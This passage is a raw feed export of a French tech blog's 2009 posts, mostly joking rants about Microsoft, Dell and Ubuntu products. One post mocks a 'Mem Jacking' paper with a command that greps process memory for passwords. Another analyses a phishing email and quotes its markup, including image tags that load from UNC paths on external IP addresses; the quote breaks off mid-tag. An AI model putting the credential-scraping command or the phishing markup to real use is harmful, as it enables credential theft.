href="http://www.microsoft.com/technet/security/Bulletin/MS08-038.mspx"&gt;MS08-038&lt;/a&gt;.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-style: italic;"&gt;Double fail.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-weight: bold;"&gt;Windows Mobile&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;J'ai eu l'occasion de récupérer un téléphone sous Windows Mobile 6.1 (passons sur les détails).&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Je l'ai prêté à ma femme, car elle pense à abandonner son vieux Sony Ericsson K750i pour un téléphone plus "moderne".&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;La première chose qu'elle a voulu faire, c'est changer le fond d'écran. Après plus de 10 minutes de recherche infructueuse, j'ai fini par lui expliquer que c'était dans :&lt;/div&gt;&lt;div&gt;&lt;blockquote&gt;Menu Démarrer &gt; Paramètres &gt; Personnel &gt; Aujourd'hui &gt; Image d'arrière plan&lt;/blockquote&gt;&lt;/div&gt;&lt;div&gt;Et que non, le menu "parcourir" ne permet pas d'avoir un aperçu des images.&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-style: italic;"&gt;Ergonomy fail.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-weight: bold;"&gt;Versioning et marketing&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;C'est officiel depuis plusieurs jours, la Beta1 de &lt;a href="http://www.microsoft.com/windows/windows-7/"&gt;Windows Seven&lt;/a&gt; est disponible.&lt;br /&gt;&lt;br /&gt;Il faut savoir que Windows "Seven" a pour numéro de version interne ... &lt;a href="http://windowsteamblog.com/blogs/windowsvista/archive/2008/10/14/why-7.aspx"&gt;6.1&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div&gt;Et que la mise à jour Vista vers Seven sera &lt;a href="http://www.techarp.com/showarticle.aspx?artno=609&amp;amp;pgno=0"&gt;&lt;span class="Apple-style-span" style="font-style: italic;"&gt;a priori&lt;/span&gt; gratuite&lt;/a&gt;.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-style: italic;"&gt;Vista fail ?&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;PS. Pour Internet Explorer, la gestion des versions est encore pire - puisqu'à peu près toutes les versions de navigateur s'installent sur toutes les versions supportées de Windows (XP / Vista / Seven). Alors si vous voulez comprendre comment ça marche, rendez-vous sur le &lt;/span&gt;&lt;a href="http://blogs.msdn.com/ie/archive/2009/01/09/the-internet-explorer-8-user-agent-string-updated-edition.aspx"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;blog Internet Explorer&lt;/span&gt;&lt;/a&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;.&lt;/span&gt;&lt;div&gt;&lt;br /&gt;&lt;todo&gt;&lt;/todo&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-weight: bold; "&gt;GDR vs. QFE&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;"On" vient de me signaler la différence subtile entre &lt;span class="Apple-style-span" style="font-style: italic;"&gt;General Distribution Release&lt;/span&gt; (GDR) et &lt;span class="Apple-style-span" style="font-style: italic;"&gt;Quick Fix Engineering&lt;/span&gt; (QFE).&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;La première contient des correctifs &lt;span class="Apple-style-span" style="font-weight: bold;"&gt;et &lt;/span&gt;des fonctionnalités supplémentaires (par exemple &lt;a href="http://www.microsoft.com/technet/network/nap/napfaq.mspx"&gt;NAP&lt;/a&gt;, apparu dans Windows XP SP3), tandis que la deuxième ne contient &lt;span class="Apple-style-span" style="font-weight: bold;"&gt;que &lt;/span&gt;les correctifs.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Le mode QFE peut être &lt;a href="http://support.microsoft.com/kb/824994"&gt;forcé à l'installation&lt;/a&gt; d'un Service Pack en passant le paramètre &lt;span class="Apple-style-span" style="font-weight: bold;"&gt;/B&lt;/span&gt;.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;On en apprend tous les jours (je n'ose pas dire &lt;span class="Apple-style-span" style="font-style: italic;"&gt;expertise fail&lt;/span&gt; :).&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-weight: bold;"&gt;Les TechDays&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Je me garderai de faire un compte-tendu exhaustif des &lt;a href="http://www.microsoft.com/france/mstechDays/"&gt;Microsoft TechDays&lt;/a&gt; édition 2009, car je suis sûr que d'autres sont déjà sur la brèche. Mes impressions à chaud:&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;Les &lt;span class="Apple-style-span" style="font-style: italic;"&gt;speakers &lt;/span&gt;Microsoft donnent en général l'impression de découvrir les &lt;span class="Apple-style-span" style="font-style: italic;"&gt;slides&lt;/span&gt; (fraichement traduits de l'anglais) à l'écran.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Pas un mot sur Vista cette année ! Comme dirait un collègue, "dans 10 ans on le confondra avec Windows ME".&lt;/li&gt;&lt;li&gt;Et surtout ... &lt;span class="Apple-style-span" style="font-style: italic;"&gt;goodies fail&lt;/span&gt; cette année :(&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;Ca reste quand même à voir pour plusieurs raisons:&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;C'est gratuit et bien situé.&lt;/li&gt;&lt;li&gt;Tout le monde y est.&lt;/li&gt;&lt;li&gt;On peut jouer avec la table &lt;a href="http://www.microsoft.com/SURFACE/index.html"&gt;Surface&lt;/a&gt; (j'ai hâte d'avoir ça dans mon salon).&lt;/li&gt;&lt;li&gt;C'est un mélange improbable entre geeks boutonneux (souvent étudiants) et hôtesses comme on en voit pas dans les salons Open Source.&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;Ceci dit, dans la "vraie vie" (i.e. les entreprises), je rencontre plus souvent des gens bloqués avec des macros VBA sous Word 97 ou des applications Visual Basic 6.0, que des passionnés qui se documentent sur les nouveautés du &lt;span class="Apple-style-span" style="font-style: italic;"&gt;Framework .NET 4.0&lt;/span&gt; ou &lt;span class="Apple-style-span" style="font-style: italic;"&gt;Windows Presentation Foundation&lt;/span&gt; ...&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-weight: bold;"&gt;L'Underground&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Parmi les conférences concurrentes des TechDays, il y avait le colloque de l'EPITECH.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Et quand je vois le &lt;a href="http://www.epitech.eu/symposium-securite-informatique-12-fev-2009-art691.html"&gt;programme&lt;/a&gt;, je me demande ce que signifie &lt;span class="Apple-style-span" style="font-style: italic;"&gt;underground &lt;/span&gt;exactement ...&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;/div&gt;&lt;blockquote&gt;&lt;div&gt;11h : Table ronde&lt;/div&gt;&lt;div&gt;    * Général Yves Mathian, ancien Directeur Technique de la DGSE&lt;/div&gt;&lt;div&gt;    * Commandant Nicolas Duvinage, Chef d'escadron&lt;/div&gt;&lt;div&gt;(...)&lt;/div&gt;&lt;div&gt;15h30 : Conférence underground : "Vulnérabilités et exploitations avancées"&lt;/div&gt;&lt;/blockquote&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-1728788376580672115?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/1728788376580672115/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=1728788376580672115' title='6 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/1728788376580672115'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/1728788376580672115'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2009/01/windows-seven-et-user-agents.html' title='Random Rants Against Microsoft'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-6439754662654733108</id><published>2009-02-09T08:00:00.000+01:00</published><updated>2009-02-09T08:00:00.418+01:00</updated><title type='text'>Dell Mini &amp; Ubuntu, fail too</title><content type='html'>Je croyais avoir fait une bonne affaire au Champion en me procurant un Dell Mini (9" de diagonale, 8 Go de disque SSD) pour &lt;a href="http://www.blogeee.net/2009/01/10/le-dell-inspiron-mini-9-a-149e/"&gt;149 euros&lt;/a&gt;. Mais c'était sans compter sur Ubuntu 8.04 (préinstallé en usine) ...&lt;br /&gt;&lt;br /&gt;Clairement, la machine a deux énormes avantages sur &lt;a href="http://news0ft.blogspot.com/2008/03/ceci-nest-pas-une-bche-gratuite.html"&gt;l'Asus EEE 701&lt;/a&gt;:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Un vrai processeur (Intel Atom) qui permet de faire tourner correctement des applications comme &lt;span style="font-size:85%;"&gt;gcc&lt;/span&gt; (indispensable sous Linux si j'ai bien compris).&lt;/li&gt;&lt;li&gt;Une vraie distribution récente, qui permet d'installer presque toutes les applications Open Source par un simple &lt;span style="font-size:85%;"&gt;apt-get&lt;/span&gt;.&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;Maintenant à l'usage on touche également assez rapidement les limites:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Le clavier est difficile d'utilisation, surtout avec sa touche M plus petite que les autres (on sent qu'il a manqué 1/2 cm ...).&lt;br /&gt;&lt;/li&gt;&lt;li&gt;La sortie de veille (&lt;span style="font-style: italic;"&gt;suspend to RAM&lt;/span&gt;) est erratique. Il vaut mieux ne rien laisser ouvert avant de fermer le capot.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Lors de la sortie de veille, le clavier est toujours en QWERTY. Il faut éditer &lt;span style="font-size:85%;"&gt;xorg.conf&lt;/span&gt; pour changer le &lt;span style="font-style: italic;"&gt;layout &lt;/span&gt;par défaut.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;La veille prolongée (&lt;span style="font-style: italic;"&gt;suspend to disk&lt;/span&gt;) n'est tout simplement pas supportée "de base".&lt;/li&gt;&lt;li&gt;Le gestionnaire de paquets fait quelques blagues (pour information, le dépôt de paquets ne semble pas être un dépôt Ubuntu "officiel"):&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/blog/up_to_date.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 468px; height: 231px;" src="http://newsoft.dyndns.org/blog/up_to_date.png" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;Mais surtout, je viens de toucher la plus grosse limite du système: le &lt;span style="font-style: italic;"&gt;driver &lt;/span&gt;de la carte WiFi (une Broadcom &lt;span style="font-size:85%;"&gt;bcm4312&lt;/span&gt;) ne supporte pas le mode &lt;span style="font-style: italic;"&gt;monitor &lt;/span&gt;!&lt;br /&gt;&lt;br /&gt;Confronté à la question, les &lt;a href="http://natisbad.org/"&gt;experts&lt;/a&gt; du &lt;a href="http://chdir.org/~nico/blog/"&gt;domaine&lt;/a&gt; ont répondu (comme je m'y attendais un peu): "il faut recompiler un noyau plus récent".&lt;br /&gt;&lt;br /&gt;Je leur ai répondu d'aller recompiler un &lt;a href="http://www.microsoft.com/resources/sharedsource/windowsacademic/researchkernelkit.mspx"&gt;WRK&lt;/a&gt;, et sur ce je considère le passage à &lt;a href="http://uneasysilence.com/archive/2008/10/13519/"&gt;Mac OS X&lt;/a&gt; !&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-6439754662654733108?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/6439754662654733108/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=6439754662654733108' title='7 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/6439754662654733108'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/6439754662654733108'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2009/02/dell-mini-ubuntu-fail-too.html' title='Dell Mini &amp; Ubuntu, fail too'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>7</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-1870462072307933458</id><published>2009-02-05T08:00:00.000+01:00</published><updated>2009-02-05T08:00:00.166+01:00</updated><title type='text'>E4300 &amp; Vista64, suite</title><content type='html'>Mes aventures avec le &lt;a href="http://news0ft.blogspot.com/2009/01/utiliser-openvpn-21-sous-vista64.html"&gt;Dell E4300 sous Vista64&lt;/a&gt; continuent ... et c'est encore un &lt;span style="font-style: italic;"&gt;fail &lt;/span&gt;multiple !&lt;br /&gt;&lt;br /&gt;Pour commencer, un &lt;a href="http://fr.wikipedia.org/wiki/Bsod"&gt;BSoD&lt;/a&gt; assez récurrent provenant de la carte WiFi Intel 5300 AGN. Dommage, elle n'est &lt;a href="http://support.dell.com/support/topics/global.aspx/support/dsn/document?docid=342250"&gt;officiellement pas supportée&lt;/a&gt; par Dell (pour le moment) ! Heureusement pour moi, Mark Russinovitch a eu le &lt;a href="http://blogs.technet.com/markrussinovich/archive/2008/12/30/3174871.aspx"&gt;même problème&lt;/a&gt; sur son Vista64 :) Il suffit donc d'abandonner le &lt;span style="font-style: italic;"&gt;driver &lt;/span&gt;Dell OEM et de télécharger le &lt;span style="font-style: italic;"&gt;driver &lt;/span&gt;Intel en version 12.0&lt;br /&gt;&lt;br /&gt;Ensuite, un autre BSoD avec le driver &lt;span style="font-size:85%;"&gt;&lt;span style="font-family:courier new;"&gt;iastor.sys&lt;/span&gt;&lt;/span&gt; (Intel Matrix Storage). Assez fourbe celui là: comme c'est un pilote de disque qui plante, le système ne peut pas générer de &lt;span style="font-style: italic;"&gt;crashdump&lt;/span&gt;. J'ai du recopier le &lt;span style="font-style: italic;"&gt;Blue Screen&lt;/span&gt; à la main ... Là encore, le bug est documenté et la &lt;a href="http://downloadcenter.intel.com/Filter_Results.aspx?strTypes=all&amp;amp;ProductID=2101&amp;amp;lang=eng&amp;amp;strOSs=44&amp;amp;submit=Go%21"&gt;mise à jour&lt;/a&gt; vers un &lt;span style="font-style: italic;"&gt;driver &lt;/span&gt;récent (non OEM) est censée corriger le problème.&lt;br /&gt;&lt;br /&gt;La mise à jour du &lt;span style="font-style: italic;"&gt;firmware &lt;/span&gt;pour le "hub de sécurité Broadcom", qualifiée "d'urgente" &lt;a href="http://support.dell.com/support/downloads/download.aspx?c=us&amp;amp;cs=555&amp;amp;l=en&amp;amp;s=biz&amp;amp;releaseid=R203757&amp;amp;SystemID=LAT_E4300&amp;amp;servicetag=&amp;amp;os=WV64&amp;amp;osl=en&amp;amp;deviceid=13615&amp;amp;devlib=0&amp;amp;typecnt=0&amp;amp;vercnt=1&amp;amp;catid=-1&amp;amp;impid=-1&amp;amp;formatcnt=1&amp;amp;libid=50&amp;amp;fileid=283928"&gt;sur le site de Dell&lt;/a&gt;, est assez folklorique également: il est nécessaire de démarrer le système sous MS-DOS, avec le TPM désactivé ! Problème: comment démarrer sous MS-DOS un système sans lecteur de disquette ni lecteur de CD-ROM ? Comment trouver une version de MS-DOS compatible avec un lecteur de CD-ROM USB par exemple ?&lt;br /&gt;&lt;br /&gt;Je suis passé par une solution illégale (Dell n'en proposant pas officiellement): &lt;a href="http://www.hiren.info/pages/bootcd"&gt;Hiren Boot CD&lt;/a&gt;, un excellent outil qui possède (entre autres) les pilotes MS-DOS pour à peu près toutes les configurations USB. De plus l'outil est &lt;a href="http://www.hiren.info/pages/bootcd-on-usb-disk"&gt;amorçable depuis une clé USB&lt;/a&gt;, ce qui permet d'y copier les mises à jour.&lt;br /&gt;&lt;br /&gt;Mais le plus beau reste à venir: le GPS intégré ! Alors qu'il avait fonctionné lors du premier démarrage de la machine, voici qu'il n'apparait plus dans la liste des périphériques détectés après quelques semaines d'utilisation.&lt;br /&gt;&lt;br /&gt;Je vous épargne la journée de dimanche dans la cour de mon immeuble[*] à essayer de diagnostiquer le problème. Lundi matin, un &lt;a href="http://natisbad.org/"&gt;collègue&lt;/a&gt; plus courageux (il a installé son E4300 sous Linux ...) me signale qu'il a résolu le problème après une semaine d'investigations sur Internet.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;[*] A un moment j'ai suspecté que le GPS n'était visible que s'il avait accroché des satellites.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;La solution est tout simplement introuvable. Le GPS ne démarre &lt;span style="font-weight: bold;"&gt;que si&lt;/span&gt; une carte SIM &lt;span style="font-weight: bold;"&gt;déverrouillée &lt;/span&gt;(code PIN fourni) est &lt;span style="font-weight: bold;"&gt;physiquement insérée&lt;/span&gt; dans le &lt;span style="font-style: italic;"&gt;laptop&lt;/span&gt;. Je ne sais pas quel génie de l'ergonomie a pu imaginer un système pareil, mais si je le trouve je l'oblige à rédiger une édition en &lt;a href="http://www.latex-project.org/"&gt;LaTeX&lt;/a&gt; de &lt;a href="http://fr.wikipedia.org/wiki/Guerre_et_Paix"&gt;Guerre et Paix&lt;/a&gt; !&lt;br /&gt;&lt;br /&gt;Accessoirement, les Unixiens qui ne bénéficient pas de l'ergonomie et de l'intégration extrême du Dell Control Point[*] ont dû &lt;a href="http://www.thinkwiki.org/wiki/Ericsson_F3507g_Mobile_Broadband_Module"&gt;documenter les commandes AT "secrètes"&lt;/a&gt; à passer au pseudo-terminal qui gère à la fois la 3G, le GPS et les antennes. C'est bon à connaitre, même sous Windows ... (et même s'il n'y a plus d'HyperTerminal sous Windows Vista).&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;[*] Second degré.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-1870462072307933458?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/1870462072307933458/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=1870462072307933458' title='2 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/1870462072307933458'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/1870462072307933458'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2009/02/e4300-vista64-suite.html' title='E4300 &amp; Vista64, suite'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-3687657321128094386</id><published>2009-02-02T22:00:00.000+01:00</published><updated>2009-02-02T22:08:38.380+01:00</updated><title type='text'>Security has failed. And everything else, too.</title><content type='html'>Une nouvelle attaque contre le Web 2.0 arrive sur le sommet de ma pile, car je vois des sites français &lt;span class="Apple-style-span" style="font-style: italic;"&gt;buzzer&lt;/span&gt; autour (&lt;a href="http://www.secuobs.com/news/26012009-mem_jacking_navigateur_web.shtml"&gt;SecuObs&lt;/a&gt;, &lt;a href="http://fr.securityvibes.com/apres-hijacking-clickjacking-car-jacking-voici-mem-jacking-buzz-323.html"&gt;SecurityVibes&lt;/a&gt;, etc.).&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Il s'agit du "Mem Jacking".&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Je lis le "&lt;a href="http://packetstormsecurity.org/papers/attack/mem-jacking.pdf"&gt;papier&lt;/a&gt;". Au moins ça n'est pas du Latex, et ça se voit.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Mais pour finir, si je comprends bien (en même temps il n'y a que 6 pages), il s'agit de lancer la commande "&lt;a href="http://trac.metasploit.com/log/framework3/trunk/tools/memdump"&gt;memdump&lt;/a&gt; | grep -i password". Il y a même un code en &lt;span class="Apple-style-span" style="font-style: italic;"&gt;assembleur&lt;/span&gt; pour faire ça - ça doit être une attaque très puissante ! [*]&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Dans le même ordre d'idée, &lt;a href="http://blogs.technet.com/swi/archive/2009/01/28/stack-overflow-stack-exhaustion-not-the-same-as-stack-buffer-overflow.aspx"&gt;Microsoft est obligé d'expliquer&lt;/a&gt; aux &lt;span class="Apple-style-span" style="font-style: italic;"&gt;would-be&lt;/span&gt; hackers la différence entre un &lt;span class="Apple-style-span" style="font-style: italic;"&gt;buffer overflow&lt;/span&gt; et la consommation de toute la mémoire allouée à la pile.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Ensuite je vais supprimer mon compte sur le site de Cigital, et là ... &lt;span class="Apple-style-span" style="font-style: italic;"&gt;Software Confidence Fail&lt;/span&gt; ...&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/blog/fail_SoftwareConfidence.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 1024px; height: 340px;" src="http://newsoft.dyndns.org/blog/fail_SoftwareConfidence.png" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Je me connecte pour la première fois en RDP à mon nouveau laptop sous Vista, et là ... "erreur de certificat: le certificat a été émis par une autorité de confiance". &lt;span class="Apple-style-span" style="font-style: italic;"&gt;Certificate Fail&lt;/span&gt; !&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/blog/fail_Cert.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 406px; height: 411px;" src="http://newsoft.dyndns.org/blog/fail_Cert.png" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Je décide de rentrer chez moi (après une journée pareille), je pars faire les courses au Champion, et là ... &lt;span class="Apple-style-span" style="font-style: italic;"&gt;Try Before You Buy Fail&lt;/span&gt; !&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/blog/fail_TryAndBuy.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 480px; height: 640px;" src="http://newsoft.dyndns.org/blog/fail_TryAndBuy.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Et encore, ça n'est que le début: il me reste &lt;span class="Apple-style-span" style="font-style: italic;"&gt;Vista 64 Fail&lt;/span&gt;, &lt;span class="Apple-style-span" style="font-style: italic;"&gt;Dell Mini Fail&lt;/span&gt; et &lt;span class="Apple-style-span" style="font-style: italic;"&gt;Caramail Fail&lt;/span&gt;. Mais ça, ça mérite un billet à part entière :)&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;[*] Attention, second degré.&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-3687657321128094386?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/3687657321128094386/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=3687657321128094386' title='5 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/3687657321128094386'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/3687657321128094386'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2009/02/security-has-failed-and-everything-else.html' title='Security has failed. And everything else, too.'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-9067511934543784557</id><published>2009-01-23T23:59:00.001+01:00</published><updated>2009-01-26T13:54:39.206+01:00</updated><title type='text'>You've got mail !</title><content type='html'>Tout commence par un email qui passe au travers des mailles de l'antispam:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/blog/impots.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 734px; height: 322px;" src="http://newsoft.dyndns.org/blog/impots.png" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div&gt;Comme j'ai un petit faible pour &lt;a href="http://www.impots.gouv.fr/"&gt;impots.gouv.fr&lt;/a&gt; et pour UTF-8, je regarde le code source du message pour trouver les liens à cliquer (par ailleurs je lis tout mon mail en texte brut &lt;a href="http://en.wikipedia.org/wiki/ASCII_Ribbon_Campaign"&gt;par conviction&lt;/a&gt; :).&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Et là ... c'est le drame !&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;/div&gt;&lt;blockquote&gt;&lt;div style="font-family: courier new;"&gt;&lt;span style="font-size:85%;"&gt;(...)&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: courier new;"&gt;&lt;span style="font-size:85%;"&gt;Received: from localhost.localdomain (s216-232-70-72.bc.hsia.telus.net [216.232.70.72])&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: courier new;"&gt;&lt;span style="font-size:85%;"&gt;(...)&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: courier new;"&gt;&lt;span style="font-size:85%;"&gt;X-Mailer: Perl script "mailer.pl"&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: courier new;"&gt;&lt;span class="Apple-tab-span" style="white-space: pre;font-size:85%;" &gt; &lt;/span&gt;&lt;span style="font-size:85%;"&gt;using Mail::Sender 0.8.16 by Jenda Krynicky, Czechlands&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: courier new;"&gt;&lt;span class="Apple-tab-span" style="white-space: pre;font-size:85%;" &gt; &lt;/span&gt;&lt;span style="font-size:85%;"&gt;running on mail.latitudestores.com (127.0.0.1)&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: courier new;"&gt;&lt;span class="Apple-tab-span" style="white-space: pre;font-size:85%;" &gt; &lt;/span&gt;&lt;span style="font-size:85%;"&gt;under account "root"&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: courier new;"&gt;&lt;span style="font-size:85%;"&gt;(...)&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;div style="font-family: courier new;"&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;[img src="\\207.210.244.20/images/banniere.jpg" alt="Actualités 2009" width="687px" id="banniere"/]&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;(...)&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;[img src="\\\\207.210.245.78/images/actualites.jpg" alt="Actualités 2009" width="687px" 